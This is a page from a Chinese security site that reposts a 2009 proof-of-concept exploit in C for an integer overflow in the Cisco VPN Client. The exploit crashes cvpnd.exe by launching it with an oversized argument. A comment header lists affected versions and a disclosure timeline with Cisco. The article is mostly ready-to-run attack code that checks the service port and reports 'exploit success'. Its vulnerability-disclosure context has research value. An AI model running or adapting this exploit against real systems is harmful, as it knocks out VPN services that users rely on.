首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cisco VPN Client 0day integer overflow denial of service proof of concept code
来源:ahernandez[at]sybsecurity.com 作者:Hernandez 发布时间:2009-11-23  
/* 
 * Cisco VPN Client 0day Integer overflow (DOS) Proof Of Concept Code
 *
 * By Alex Hernandez aka alt3kx (c) November 2009
 *
 * This POC is only for test. If an application read a malformed chars 
 * file like this POC, the application will be crashed.
 *
 * We tested this code on:
 *
 * Windows Vista Bussines SP1 Spanish
 * Windows Vista Home Premium  SP1 English
 * Windows 2000 Server English
 * Windows XP Professional SP3
 *
 * Cisco VPN client version 5.0.03.0560
 * Cisco VPN client Version 5.0.04.0300
 * Cisco VPN client Version 5.0.05.0290
 * Cisco VPN client Version 4.8.02.0010
 * 
 * Compiled on VC++ win32
 *  
 * Friends:
 * sirdarckcat, nitr0us, hkm, crypkey, xDAWN, canit0, chr1x
 *
 * TT & DSRT
 * daSh, p4r4n01ds, darkslaker, beto, motis. 
 *
 * Very special credits to:
 *
 * str0ke (milw0rm.com)
 * rathaus (securiteam.com)
 * FX (Phenoelit.de)
 * dSR! (segfault.es)
 * 0dd (0dd.com)
 * 
 * 
 * PH-Neutral 0x7d9, We hope to see u there intruders
 * 
 * ---------------
 * Report Timeline 
 * ---------------
 * 06/03/2009	The vulnerability was discovered.
 * 07/03/2009	Exploit/PoC code was developed (private).
 * 09/03/2009	Cisco PSIRT was notified about the issue.
 * 11/03/2009	Vendor response asking for details of the testing environment.
 * 12/03/2009	Test scenario explained and sent a PDF document with details.
 * 16/03/2009	Developers/PSIRT confirmed the vulnerability.
 * 19/03/2009	New test scenarios around new versions (CISCO VPN client).
 * 23/03/2009	CISCO PSIRT assing an internal tracking PSIRT-0676131279.
 * 23/03/2009	CISCO PSIRT assing an Bug ID-CSCsz49276.
 * 15/04/2009	New Advisory release (private).
 * 16/04/2009	New PSIRT feedback no ETA avaiable.
 * 23/04/2009	The development team working the fix.
 * 01/05/2009	The development team estimated one month to fix.
 * 01/06/2009	New PSIRT feedback, no ETA available.
 * 29/06/2009	The development team estimated one month to fix.
 * 28/07/2009	The development team working on maitenance release.
 * 28/07/2009	The development team estimated one month to fix.
 * 02/09/2009	New vulnerabilities found on CISCO VPN client.
 * 02/09/2009	The development team can not publish the new version 5.0.6.
 * 02/09/2009	The development team working on maitenance release.
 * 02/09/2009	The development team estimated one month to fix.
 * 10/09/2009	The BETA program should be finished by the end of Oct 
 * and the client posted next month.
 * 07/10/2009	The development team estimated one month to fix.
 * 11/11/2009	New PSIRT feedback RNA avaiable.
 * 19/11/2009	The vulnerability goes public and PSIRT is informed.
 * 19/11/2009	Fix and details will available on CISCO Intellishield Alert & Bug Tool kit.
 * 
 * CISCO Fix and Details:
 * 
 * BugToolKit:
 * http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsz49276
 *
 * Intellishield Alert:
 * http://tools.cisco.com/security/center/viewAlert.x?alertId=19445
 * 
 */
 
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#pragma comment ( lib, "ws2_32.lib" )
 
int CheckPortUDP( short int nPort )
{
    struct sockaddr_in nSockServer;
 
    WSADATA wsaData;
 
    int lBusy = 0;
    int nSocket;
 
    /* Initialization */
    if( WSAStartup( 0x0101, &wsaData ) == 0 )
    {
        /* Create Socket */
        nSockServer.sin_family      = AF_INET;
        nSockServer.sin_port        = htons( nPort );
        nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
 
        /* Check UDP Protocol */
        nSocket = socket( AF_INET, SOCK_DGRAM, 0 );
 
        lBusy = ( bind( nSocket, (SOCKADDR FAR *) &nSockServer,
                            sizeof( SOCKADDR_IN ) ) == SOCKET_ERROR );
 
        /* Close Socket if Busy */
        if( lBusy )
            closesocket( nSocket );
 
        /* Close Winsock */
        WSACleanup();
    }
 
    /* Return */
    return( lBusy );
}

int CheckPortTCP( short int nPort )
{
    struct sockaddr_in nSockServer;
 
    WSADATA wsaData;
 
    int lBusy = 0;
    int nSocket;
 
    /* Initialization */
    if( WSAStartup( 0x0101, &wsaData ) == 0 )
    {
        /* Create Socket */
        nSockServer.sin_family      = AF_INET;
        nSockServer.sin_port        = htons( nPort );
        nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
 
        /* Check TCP Protocol */
        nSocket = socket( AF_INET, SOCK_STREAM, 0 );
 
        lBusy = ( connect( nSocket, (struct sockaddr *) &nSockServer,
                     sizeof( nSockServer ) ) == 0 );
 
        /* Close Socket if Busy */
        if( lBusy )
            closesocket( nSocket );
 
        /* Close Winsock */
        WSACleanup();
    }
 
    /* Return */
    return( lBusy );
}

int main(void)
{

	char szPath[] = "C:\\Program Files\\Cisco Systems\\VPN Client\\cvpnd.exe";
	//uncomment this line for Windows XP Spanish versions
	//char szPath[] = "C:\\Archivos de programa\\Cisco Systems\\VPN Client\\cvpnd.exe";
	char buffer[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
	PROCESS_INFORMATION pif;
	STARTUPINFO si;
	ZeroMemory(&si,sizeof(si));
	si.cb = sizeof(si);

	BOOL bRet = CreateProcess(
        szPath,
        buffer,
        NULL,
        NULL,
        FALSE,
        0,
        NULL,
        NULL,
        &si,
        &pif);
	
	system("cls");
	printf("\n .:: Cisco VPN Client 0day Integer overflow (DoS) Proof Of Concept Code ::.\n");
	printf(" .:: By Alex Hernandez aka alt3kx (c) November 2009 .::\n\n");  

	
	/* Check for TCP Port */
 
    if( CheckPortTCP(62514) )
        printf("[+] Cisco VPN Client TCP port listening\t[OK!]\n");
    else
        printf("[+] Cisco VPN Client TCP Port isn't Busy\t[Wrong!]\n");

    /* Check for UDP Port */
 
    if( CheckPortUDP(62514) )
        printf("[+] Cisco VPN Client UDP port listening\t[OK!]\n");
    else
        printf("[+] Cisco VPN Client UDP Port isn't Busy\t[Wrong!]\n");

	if(bRet == FALSE){MessageBox(HWND_DESKTOP,"Unable to start program check the default PATH Cisco VPN Client cvpnd.exe\n","",MB_OK);
    return 1;}

	else if (bRet == TRUE){MessageBox(HWND_DESKTOP,"Attempting exploit Cisco VPN DoS exploit...","",MB_OK);
		printf("\n[+] Few seconds to crash the program...\n");
		printf("[+] Exploit success...\n\n");
	return 1;} 

    CloseHandle(pif.hProcess);
    CloseHandle(pif.hThread);

}





 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·KDE KDELibs 4.3.3 Remote Array
·Opera version 10.01 suffers fr
·Joomla 1.5.12 RCE via TinyMCE
·Internet Explorer 6/7 CSS Hand
·Baby Web Server version 2.7.2
·OSI Codes PHP Live! Support ve
·Paper on poisoning a torrent's
·PHP 5.2.11 tempnam() safe_mode
·Adobe browser document ActiveX
·XM Easy Personal FTP Server ve
·Avast 4.8.1351.0 antivirus asw
·TYPSoft FTP server remote deni
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved